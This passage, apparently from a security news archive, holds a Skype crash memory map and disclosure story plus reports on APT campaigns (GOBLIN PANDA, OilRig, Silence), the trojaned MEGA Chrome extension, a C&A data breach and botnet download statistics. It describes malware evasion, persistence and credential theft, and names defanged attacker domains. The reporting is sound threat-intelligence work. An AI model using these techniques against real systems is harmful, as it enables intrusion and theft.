7fb4e6dd5000-7fb4e6dd6000 rw-p 002a0000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6dd6000-7fb4e6e1b000 r-xp 00000000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e6e1b000-7fb4e701a000 ---p 00045000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701a000-7fb4e701d000 r--p 00044000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701d000-7fb4e701e000 rw-p 00047000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701e000-7fb4e7057000 r-xp 00000000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7057000-7fb4e7257000 ---p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7257000-7fb4e7258000 r--p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7258000-7fb4e7259000 rw-p 0003a000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7259000-7fb4e72f6000 r-xp 00000000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e72f6000-7fb4e74f6000 ---p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74f6000-7fb4e74fa000 r--p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74fa000-7fb4e74fc000 rw-p 000a1000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74fc000-7fb4e74fd000 rw-p 00000000 00:00 0
7fb4e74fd000-7fb4e74fe000 ---p 00000000 00:00 0
7fb4e74fe000-7fb4e7cfe000 rw-p 00000000 00:00 0
7fb4e7cfe000-7fb4e7dc3000 r-xp 00000000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7dc3000-7fb4e7fc2000 ---p 000c5000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fc2000-7fb4e7fcb000 rw-p 000c4000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fcb000-7fb4e7fdf000 rw-p 00000000 00:00 0
7fb4e7fdf000-7fb4e7fff000 rw-p 00101000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fff000-7fb4ec000000 rw-s 00000000 00:1a 12 /dev/shm/pulse-shm-2958556533
7fb4ec000000-7fb4ec021000 rw-p 00000000 00:00 0
7fb4ec021000-7fb4f0000000 ---p 00000000 00:00 0
7fb4f002d000-7fb4f0091000 rw-s 00000000 00:1a 90 /dev/shm/.org.chromium.Chromium.JPBrMl (deleted)
7fb4f0091000-7fb4f00d1000 rw-s 00000000 00:1a 134 /dev/shm/.org.chromium.Chromium.ctJK62 (deleted)
7fb4f00f1000-7fb4f0151000 rw-s 00000000 00:1a 89 /dev/shm/.org.chromium.Chromium.kfsXYI (deleted)
7fb4f0151000-7fb4f01d2000 rw-s 00000000 08:01 1838001 /home/input0/snap/skype/common/.config/skypeforlinux/Cache/index
7fb4f01d2000-7fb4f01d3000 ---p 00000000 00:00 0
7fb4f01d3000-7fb4f09d3000 rw-p 00000000 00:00 0
7fb4f09d3000-7fb4f0a1f000 r-xp 00000000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0a1f000-7fb4f0c1e000 ---p 0004c000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c1e000-7fb4f0c21000 r--p 0004b000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c21000-7fb4f0c22000 rw-p 0004e000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c22000-7fb4f0c26000 rw-p 00050000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c26000-7fb4f0cba000 r-xp 00000000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0cba000-7fb4f0eb9000 ---p 00094000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eb9000-7fb4f0ec0000 rw-p 00093000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0ec0000-7fb4f0ed3000 rw-p 00000000 00:00 0
7fb4f0ed3000-7fb4f0eea000 rw-p 000c1000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eea000-7fb4f12eb000 rw-s 00000000 00:1a 112 /dev/shm/.org.chromium.Chromium.8b0GDI (deleted)
7fb4f12eb000-7fb4f132b000 rw-s 00000000 00:1a 110 /dev/shm/.org.chromium.Chromium.wo010t (deleted)
7fb4f136b000-7fb4f13ab000 rw-s 00000000 00:1a 108 /dev/shm/.org.chromium.Chromium.4MWzbK (deleted)
7fb4f13ab000-7fb4f13eb000 rw-s 00000000 00:1a 107 /dev/shm/.org.chromium.Chromium.PCNSgn (deleted)
7fb4f13eb000-7fb4f142b000 rw-s 00000000 00:1a 106 /dev/shm/.org.chromium.Chromium.UUZcm0 (deleted)
7fb4f146b000-7fb4f14ab000 rw-s 00000000 00:1a 104 /dev/shm/.org.chromium.Chromium.MzjVwg (deleted)
7fb4f14bb000-7fb4f14cb000 rw-s 00000000 00:1a 118 /dev/shm/.org.chromium.Chromium.GgMWqU (deleted)
7fb4f14cb000-7fb4f14eb000 rw-s 00000000 00:1a 109 /dev/shm/.org.chromium.Chromium.CbpRGw (deleted)
7fb4f14eb000-7fb4f152b000 rw-s 00000000 00:1a 38 /dev/shm/.org.chromium.Chromium.keWIHw (deleted)
7fb4f152b000-7fb4f156b000 rw-s 00000000 00:1a 102 /dev/shm/.org.chromium.Chromium.9HJ9M9 (deleted)
7fb4f1577000-7fb4f1587000 rw-s 00000000 00:1a 113 /dev/shm/.org.chromium.Chromium.UPK1Ee (deleted)
7fb4f1587000-7fb4f15eb000 rw-s 00000000 00:1a 34 /dev/shm/.org.chromium.Chromium.leYub6 (deleted)
7fb4f15eb000-7fb4f162b000 rw-s 00000000 00:1a 97 /dev/shm/.org.chromium.Chromium.6IeB32 (deleted)
7fb4f162b000-7fb4f1a2c000 rw-s 00000000 00:1a 85 /dev/shm/.org.chromium.Chromium.6d3WFD (deleted)
7fb4f1a2c000-7fb4f1a6c000 rw-s 00000000 00:1a 83 /dev/shm/.org.chromium.Chromium.IjR5gj (deleted)
7fb4f1a6c000-7fb4f1aac000 rw-s 00000000 00:1a 88 /dev/shm/.org.chromium.Chromium.cG4AwK (deleted)
7fb4f1aac000-7fb4f1aec000 rw-s 00000000 00:1a 77 /dev/shm/.org.chromium.Chromium.StnttE (deleted)
7fb4f1aec000-7fb4f1b2c000 rw-s 00000000 00:1a 71 /dev/shm/.org.chromium.Chromium.xRFG4j (deleted)
7fb4f1b2c000-7fb4f1b2d000 ---p 00000000 00:00 0
7fb4f1b2d000-7fb4f25f5000 rw-p 00000000 00:00 0
7fb4f25f5000-7fb4f25f6000 ---p 00000000 00:00 0
7fb4f25f6000-7fb4f2df6000 rw-p 00000000 00:00 0
7fb4f2df6000-7fb4f2dfb000 r-xp 00000000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2dfb000-7fb4f2ffb000 ---p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffb000-7fb4f2ffc000 r--p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffc000-7fb4f2ffd000 rw-p 00006000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffd000-7fb4f2ffe000 ---p 00000000 00:00 0
7fb4f2ffe000-7fb4f37fe000 rw-p 00000000 00:00 0
7fb4f37fe000-7fb4f37ff000 ---p 00000000 00:00 0
7fb4f37ff000-7fb4f3fff000 rw-p 00000000 00:00 0
7fb4f3fff000-7fb4f8000000 rw-s 00000000 00:1a 7 /dev/shm/pulse-shm-796608596
7fb4f8000000-7fb4f8083000 rw-p 00000000 00:00 0
7fb4f8083000-7fb4fc000000 ---p 00000000 00:00 0
7fb4fc000000-7fb4fc021000 rw-p 00000000 00:00 0
7fb4fc021000-7fb500000000 ---p 00000000 00:00 0
7fb500000000-7fb500021000 rw-p 00000000 00:00 0
7fb500021000-7fb504000000 ---p 00000000 00:00 0
7fb504000000-7fb504021000 rw-p 00000000 00:00 0
7fb504021000-7fb508000000 ---p 00000000 00:00 0
7fb508000000-7fb508021000 rw-p 00000000 00:00 0
7fb508021000-7fb50c000000 ---p 00000000 00:00 0
7fb50c000000-7fb50c30a000 rw-p 00000000 00:00 0
7fb50c30a000-7fb510000000 ---p 00000000 00:00 0
7fb510000000-7fb510028000 rw-p 00000000 00:00 0
7fb510028000-7fb514000000 ---p 00000000 00:00 0
7fb514000000-7fb514008000 rw-s 00000000 00:1a 187 /dev/shm/.org.chromium.Chromium.wp000v (deleted)
7fb514008000-7fb514048000 rw-s 00000000 00:1a 68 /dev/shm/.org.chromium.Chromium.kV2UFZ (deleted)
7fb514048000-7fb514088000 rw-s 00000000 00:1a 87 /dev/shm/.org.chromium.Chromium.JUxFl8 (deleted)
7fb514088000-7fb5140c8000 rw-s 00000000 00:1a 65 /dev/shm/.org.chromium.Chromium.476qSk (deleted)
7fb5140c8000-7fb514108000 rw-s 00000000 00:1a 96 /dev/shm/.org.chromium.Chromium.1d878F (deleted)
7fb514108000-7fb514148000 rw-s 00000000 00:1a 86 /dev/shm/.org.chromium.Chromium.IHmLaw (deleted)
7fb514148000-7fb51414a000 r-xp 00000000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7fb51414a000-7fb514349000 ---p 00002000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_mini
$
Cool, so when I read the backtrace, I understood that this might be a memory corruption in `malloc()`.

So basically, the memory allocator allocates pages of memory at once for use of programs, and it gives you a pointer within them. Since this files which I am trying to share may be larger for skype to handle during the call (PS: I was just sharing a jpg file in this case which was of 800kB). But for skype if a larger program is allocating larger amounts of memory and writing further past the end of your allocated space, then you’ll end up attempting to write into unallocated memory and may cause a memory corruption.

Being a fan of responsible disclosure, I submitted this to Microsoft on 8 August 2018, but MS says “Upon investigation, we have determined that this submission does not meet the bar for security servicing” 🤦

Okay, but I passed on this message to skype team on twitter, and they looked into this!

skype bug
At last, this was patched on Skype version 8.29.0.41 on Linux.


CrowdStrike uncovered a new campaign of GOBLIN PANDA APT aimed at Vietnam
6.9.2018 securityaffairs APT

Researchers from security firm CrowdStrike have observed a new campaign associated with the GOBLIN PANDA APT group.
Experts from security firm CrowdStrike have uncovered a new campaign associated with the GOBLIN PANDA APT group.

The group also knows as Cycldek was first spotted in September 2013, it was mainly targeting entities in Southeast Asia using different malware variants mainly PlugX and HttpTunnel.

In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.

The group is back and is targeting once again Vietnam running a spear phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes

“Last month, CrowdStrike Intelligence observed renewed activity from GOBLIN PANDA targeting Vietnam. As part of this campaign, new exploit documents were identified with Vietnamese-language lures and themes, as well as Vietnam-themed, adversary-controlled infrastructure.” reads the analysis published by CrowdStrike.

“Two exploit documents with Vietnamese-language file names were observed with file metadata unique to the GOBLIN PANDA adversary.”

The researchers analyzed two weaponized documents written in Vietnamese-language and attributed them to GOBLIN PANDA based their metadata.

The decoy documents have training-related themes and trigger the Office vulnerability CVE-2012-0158 flaw to deliver a malware implant tracked as QCRat by CrowdStrike Falcon Intelligence.

The document did not specifically reference projects related to the Vietnamese government or departments, however, they could be used to trick Government of Vietnam personnel to open them.

According to CrowdStrike, the decoy documents use a previously identified legitimate executable, a side-loading implant Dynamic Link Library (DLL), and new implant configuration files stored as a .tlb file.

The analysis of command and control servers suggests that GOBLIN PANDA hackers are also targeting entities in Laos.

“Analysis of command and control infrastructure suggests that GOBLIN PANDA is targeting entities in Laos, as well. CrowdStrike Intelligence has not directly observed Laotian targeting, and cannot confirm targets in Laos for this campaign, however, previous activity linked to GOBLIN PANDA has targeted this country.” concludes the report.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,”


Group-IB UncoversAPT- attacks on Banks: The Sound of Silence
6.9.2018 securityaffairs APT

Researchers at security firm Group-IB have exposed the attacks carried out by the Silence cybercriminal group, providing details on its tactics and tools.
Experts at security firm Group-IB have exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group’s activity in more than 25 countries worldwide.

Group-IB has published its first detailed report “Silence: Moving into the darkside” on tactics and tools employed by the cybercriminals. Group-IB security analysts’ hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD.

After the activity of Cobalt group has declined, Silence became one of the major threats to Russian and international banks. Once only known to cybersecurity specialists, Silence is an example of a mobile, small, and young group that has been progressing rapidly. Confirmed thefts by Silence increased more than fivefold from just 100 000 USD in 2017 to 550 000 USD in less than a year. The current confirmed total thefts form Silence attacks stands at 800 000 USD.

For more than two years, there was not a single sign of Silence that would enable to identify them as an independent cybercrime group. The timeline and nature of the attacks identified by Group-IB forensic specialists suggested strongly that the first attacks were very amateur in nature and the criminals were learning as they went along. Since autumn 2017, the group has become more active. Based on analysis and comparison with other incidents and financial APT timelines, it is clear that Silence analyses methods of other criminal groups and applies new tactics and tools on various banking systems – AWS CBR (Automated Work Station Client of the Russian Central Bank), ATMs, and card processing.

Group-IB incident response and intelligence teams detected Silence’s activity in 2016 for the very first time. Silence members attempted to withdraw money via AWS CBR; however, due to some errors in payment orders, the theft was successfully prevented. In 2017, Silence began to conduct attacks on ATMs. The first incident confirmed by Group-IB revealed that gang members stole 100 000 USD from ATMs in just one night. In 2018, they targeted card processing using supply-chain attack, picking up 550 000 USD via ATMs of the bank’s counterpart over one weekend. In April 2018, two months after they successfully targeted card processing, the group decided to leverage its previous scheme and stole roughly 150 000 USD through ATMs. At this point, the attacks described above can be unequivocally attributed to Silence, but Group-IB security experts believe that there have been other successful attacks on banks. Silence Group

Who are Silence?

Group-IB experts concluded that Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

There appear to be just two members in Silence—a developer and an operator. This explains why they are so selective in their attack targets, and why it takes them so long (up to 3 months, which is at least three times longer than Anunak, Buhtrap, MoneyTaker and Cobalt) to commit a theft. One gang member – a developer – has skills of a highly experienced reverse engineer. He develops tools to conduct attacks and modifies complex exploits and software. However, in development he makes a number of errors, that are quite common for virus analysts or reverse engineers; he knows exactly how to develop software, but he does not know how to program properly. The second member of the team is an operator. He has experience in penetration testing, which means he can easily find his way around banking infrastructure. He is the one who uses the developed tools to access banking systems and initiates the theft process.

Silence’s tools and methods

Like most cybercrime groups, Silence uses phishing emails. Initially, the group used hacked servers and compromised accounts for its campaigns. Later on, the criminals began to register phishing domains, for which they created self-signed certificates. Silence designs very well-crafted phishing emails usually purporting to be from bank employees. To conduct their phishing campaigns, the hackers rent servers in Russia and the Netherlands. Silence also uses Ukraine-based hosting services to rent servers to use as C&C servers. A number of servers were rented at MaxiDed, whose infrastructure was blocked by Europol in May 2018.

In their first operations, Silence used a borrowed backdoor – Kikothac, which makes it clear that the group began its activity without any preparation—these were attempts to test the waters. Later, the group’s developer created a unique set of tools for attacks on card processing and ATMs including Silence— a framework for infrastructure attacks , Atmosphere—a set of software tools for attacks on ATMs, Farse—a tool to obtain passwords from a compromised computer, and Cleaner—a tool for logs removal.

“Silence, in many ways, is changing the perception of cybercrime in terms of the nature of the attacks, the tools, tactics, and even the members of the group. It is obvious that the criminals responsible for these crimes were at some point active in the security community. Either as penetration testers or reverse engineers,” says Dmitry Volkov, Chief Technology Officer and Head of Threat Intelligence at Group-IB.

“They carefully study the attacks conducted by other cybercriminal groups, and analyse antivirus and Threat Intelligence reports. However, it does not save them from making mistakes; they learn as they go. Many of Silence’s tools are legitimate, others they developed themselves and learn from other gangs. After having studied Silence’s attacks, we concluded that they are most likely white hats evolving into black hats. The Internet, particularly the underground web, favours this kind of transformation; it is far easier now to become a cybercriminal than 5–7 years ago—you can rent servers, modify existing exploits, and use legal tools. It makes things more complicated for blue teams and much easier for hackers”.


MEGA Chrome browser extension hacked, bogus version stole users’ credentials
6.9.2018 securityaffairs Incindent

The MEGA Chrome browser extension had been hacked and replaced with a one that steals users’ credentials for popular web services
Are you using the MEGA Chrome browser extension? Uninstall it now because the Chrome extension for MEGA file storage service had been hacked and replaced with a one that steals users’ credentials for popular web services (i.e. Amazon, Microsoft, Github, and Google) and private keys for cryptocurrency wallets (i.e. MyEtherWallet and MyMonero, and Idex.market cryptocurrency trading platform.).

According to Mega, on 4 September at 14:30 UTC, an attacker hacked into the company Google Chrome web store account and uploaded a malicious version 3.39.4 of the extension.

“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore.” reads the security advisory published by Mega.

“Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market and HTTP POST requests to other sites, to a server located in Ukraine. Note that mega.nz credentials were not being exfiltrated.”

Once installed, or after an auto-update, the malicious Mega Chrome extension asked for elevated permissions to steal the sensitive data and send it back a server controlled by the attackers that is located in Ukraine (megaopac[.]host).

After four hours the security breach, Mega updated a clean version (3.39.5) on the store, and affected installations were auto updated., Google removed the malicious extension from the Chrome webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled, and you accepted the additional permission, or if you freshly installed version 3.39.4,” continues the advisory.

Mega highlighted that Google disallowed publishers to sign their Chrome extensions and opted to rely solely on signing them automatically once the extension is uploaded, opening the door to similar compromise.

The Italian security researcher who handles the Twitter account @serhack_ first reported the breach on both Reddit and Twitter.

SerHack
@serhack_
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!

LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.

Version: 3.39.4

It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz

7:16 PM - Sep 4, 2018
1,351
1,701 people are talking about this
Twitter Ads info and privacy
At the time it is not clear how many users have installed the malicious MEGA Chrome browser extension, experts speculate tens of millions of users. may have been affected.

The Firefox version of MEGA has not been compromised and Users accessing https://mega.nz without the Chrome extension have not been affected.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4.” the company added.

“Please note that if you visited any site or made use of another extension that sends plain-text credentials through POST requests, either by direct form submission or through a background XMLHttpRequest process (MEGA is not one of them) while the trojaned extension was active, consider that your credentials were compromised on these sites and/or applications.”

Users who had installed the malicious MEGA Chrome browser extension must uninstall the version 3.39.4 and change passwords for all their accounts.

@SerHack published an interesting post on the hack, I suggest you read it.


New OilRig APT campaign leverages a new variant of the OopsIE Trojan

6.9.2018 securityaffairs APT
The Iran-linked APT group OilRig was recently observed using a new variant of the OopsIE Trojan that implements news evasion capabilities.
Experts at Palo Alto observed a new campaign carried out by the Iran-linked APT group OilRig that was leveraging on a new variant of the OopsIE Trojan.

The OilRig hacker group is an Iran-linked APT that has been around since at least 2015, since then it targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.

The OopsIE Trojan is one of the malware in the APT’s arsenal that was detected for the first time in February 2018.

In July the hackers leveraged a new variant of the Trojan that implements new anti-analysis and evasion detection capabilities.

The OopsIE variant used in the last campaign begins its execution by performing a series of anti-analysis checks.

It would check CPU fan information (it is the first time a malware checks CPU fan info), temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

The campaign was also delivering the QUADAGENT backdoor, anyway, experts noticed the group using a different malware for each targeted organization.

“In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT.” reads the analysis published by Paolo Alto Network

“The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT.”

The hackers launched spear phishing attacks against a government agency using compromised email accounts at a government organization in the same country in the Middle East.

The OilRig hackers sent the phishing messages to the email address of a user group that had published documents regarding business continuity management, the subject of the messages was in Arabic, which translated to “Business continuity management training”.

The new OopsIE variant would check the TimeZone.CurrentTimeZone.DaylightName property, it runs only in presence of strings for Iran, Arab, Arabia, and Middle East.

The attack is highly targeted because the previous check allows hitting only five time zones that encompass 10 countries.

Oilrig OopsIE

The new variant connects the www.windowspatch[.]com domain as domain and also sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript to gain persistence every three minutes.

The malware supports various commands, it can write the output to a file and send it to the server, download a file to the system, read a specified file and upload its contents, and uninstall itself.

“The OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add capabilities to their tools while still functionally using the same tactics over and over again.” concludes the report.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.


International clothing chain C&A in Brazil suffered a data breach

6.9.2018 securityaffairs Incindent
The clothing chain C&A in Brazil suffered a cyber attack on its gift card/exchange system last week, hackers leaked data on Pastebin.
The International fashion retail clothing chain C&A in Brazil suffered a data breach, the company confirmed hackers hit its gift card platform.

Hackers accessed to records belonging to customers who purchased gift cards, exposed data includes ID numbers, email addresses, the amount loaded into the cards, order number and data of purchase.

A member of the Fatal Error Crew hacker group that use the moniker @joshua has published on Pastebin the data from C&A customers who purchased gift cards online.

“Since you like to play with the data of others, we’ve decided to play around with your systems,” wrote hacker Joshua when he published the data.

“We would like to point out that we do not have the list of Gift Cards C & A or any other list of personal information of the customer, we mapped the same through the ID and only posted some internal information for staff C & A confirms the invasion We will not distribute any personal information on the internet since we do not endorse financial crimes Customer data is secure, the few published GiftCards were in the return section, so they would be discarded – Fatal Error Crew “reads a statement published by The Fatal Error Crew.

According to the Brazilian website Tecmundo, data of about 36,000 customers have been exposed in the attack.

“In a conversation with TecMundo, Joshua said that four million orders are exposed – Joshua says that “probably” there are data from two million different customers, considering more than one request per customer. Directly in the present card system, with their numbers, are exposed the data of 36 thousand.” reported TecMundo.

C&A

According to Brazilian newspaper ‘O Globo,’ the Public Ministry of the Federal District and Territories (MPDFT) has launched an investigation on the data breach fearing that data from 2 million customers of C&A were leaked online.

The company confirmed to have detected the incident last week and immediately started the incident response procedures, it also reported the intrusion to the authorities.

C&A highlighted that it doesn’t use personal data for any unauthorized purposes.

“we reiterate our commitment to ethics and respect to the laws and that we work to offer the best possible experience to our customers, and that includes the online environment.” added C&A.


What are botnets downloading?

5.9.2018 Kaspersky   BotNet
Statistics for the past year on files downloaded by botnets
CONTENTS
Spam mailshots with links to malware and bots downloading other malware are just a couple of botnet deployment scenarios. The choice of infectious payload is limited only by the imagination of the botnet operator or customer. It might be a ransomware, a banker, a miner, a backdoor, the list goes on, and you don’t need to go far for examples: take Gandcrab and Trik, or Locky and Necurs, for instance. Every day we intercept numerous file-download commands sent to bots of various types and families. Here we present the results of our botnet activity analysis for H2 2017 and H1 2018.

Methodology
Excluded from the statistics are update files downloaded by bots, since their number depends heavily on the algorithm of the particular malware in question and has an impact on the final distribution. The analysis also excludes configuration files whose download depends on the botnet algorithm and is not relevant to this article. What’s more, we only took account of unique (in terms of MD5 hash) files. The results are based on the analysis of commands from more than 60,000 different C&C associated with 150 bot families and their modifications.

Kaspersky Lab tracks the activity of botnets using Botnet Tracking, a technology that emulates infected computers (bots) to retrieve operational data about the actions of botnet operators.

The total number of unique malicious files downloaded by our bots in H1 2018 fell by 14.5% against H2 2017.

Number of unique malicious files, H2 2017 — H1 2018 (download)

Most popular
After analyzing the files downloaded by the bots, we identified the most widespread families. Note that the top of the list of most “popular” downloads changes little over time. In 2018, as last year, the backdoor njRAT accounted for many downloads. Its share among all files downloaded by bots increased from 3.7% to 5.2%, meaning that more than 1 in each 20 bot-downloaded files is njRAT. This widespread distribution is due to the variety of versions of the malware and the ease of setting up one’s own backdoor, creating a low entry threshold.

H2 2017 Share H1 2018 Share
1 Lethic 17.0% njRAT 5.2%
2 Neutrino.POS 4.6% Lethic 5.0%
3 njRAT 3.7% Khalesi 4.9%
4 Emotet 3.5% Miners 4.6%
5 Miners 2.9% Neutrino.POS 2.2%
6 Smoke 1.8% Edur 1.3%
7 Cutwail 0.7% PassView 1.3%
8 Ransomware 0.7% Jimmy 1.1%
9 SpyEye 0.5% Gandcrab 1.1%
10 Snojan 0.3% Cutwail 1.1%
Most downloaded threats, H2 2017 — H1 2018

Very often, botnets are used to distribute cryptocurrency mining tools. In H1 2018 miners accounted for 4.6% of all downloaded files, a far higher figure than in H2 2017 (2.9%).

Yet cybercriminal interest in ordinary currencies remains high, as evidenced by the presence of Neutrino.POS and Jimmy in the Top 10. In H2 2017, Neutrino.POS was downloaded in 4.6% of all cases. In 2018, its share in the overall stream of downloaded files declined, but its “cousin” Jimmy helped out by adding 1.1% to the share of banking Trojans.

Distribution map of the Top 10 downloaded threats, H2 2017 (download)

In H1 2018, the Trojan Khalesi was in third place in our ranking, accounting for 4.9% of downloaded files. But while in 2017 the Remcos, BetaBot, Smoke, and Panda bots were involved in downloading the Trojan, in 2018 Khalesi was downloaded only by the spam bot Lethic.

On a separate note, the H1 2018 Top 10 features Mail PassView, a legal password recovery tool for various email clients. Distributed via the Remcos backdoor, it is likely used to obtain passwords for victim mailboxes.

The Cutwail, Lethic, and newly rebranded Emotet bots are also firmly rooted in the Top 10.

Compared to H2 2017, the number of ransomware encryptors downloaded by bots has risen this year. Despite the overall decline in the distribution of ransomware programs, botnet operators continue to deliver them to victims. According to our data, most ransomware programs in 2017 were downloaded by the Smoke bot, but in 2018 top spot has been seized by Nitol. GandCrab ransomware is a newbie in the Top 10 most downloaded families of 2018. It appeared in 2018 and was immediately deployed and distributed by several botnet operators, most actively by Trik.

Distribution map of the Top 10 downloaded threats, H1 2018 (download)

In terms of behavior, the clear leaders in both halves are Trojans with such diverse capabilities that it’s difficult to pinpoint their “specialization.” A significant proportion is made up of bankers and backdoors ensuring maximum theft of important information. What’s more, last year’s most common malware included a large number of spam bots, largely due to the above-mentioned Lethic.

Distribution of downloaded files by behavior, H2 2017 — H1 2018 (download)

Most “versatile”
Among the families under observation, we identified the most “versatile” — that is, those downloading the largest number of different files. Such diversity can be the result of several factors:

Different botnets from the same family are managed by different operators with varying objectives.
Operators “lease” their botnets, allowing them to be used to distribute malware.
A botnet changes its “specialization” (for example, Emotet turned from a banking Trojan turned into a spam bot)
In 2018, as in 2017, the most “versatile” bots were Hworm, Smoke, and BetaBot (a.k.a. Neurevt).

Distribution of downloaded files by behavior for Hworm, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Smoke, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Betabot, H2 2017 — H1 2018 (download)

As we already mentioned, hidden mining software is very popular, as confirmed by the statistics. Despite the variety of downloaded malware, miners invariably end up in the Top 3.

Backdoors also feature heavily due to the wide-ranging options they provide for cybercriminals, from saving screenshots and keystrokes to direct control over the target device.

Most “international”
In terms of territorial distribution of control servers, the backdoor Njrat unsurprisingly claimed the “most international” prize, with C&C centers in 99 countries. This geographical scope is down to the ease of configuring a personal backdoor, allowing anyone to create their own botnet with minimal knowledge of malware development.

Distribution map of Njrat C&C centers, H2 2017 — H1 2018 (download)

Next come the backdoors DarkComet and NanoCore RAT. They share silver and bronze, having C&Cs in almost 80 countries worldwide. Despite the arrest of the creator of NanoCore, he managed to sell the source code of his privately developed RAT, which is now actively used by other cybercriminals.

Distribution map of DarkComet C&C centers, H2 2017 — H1 2018 (download)

Distribution map of NanoCore RAT C&C centers, H2 2017 — H1 2018 (download)

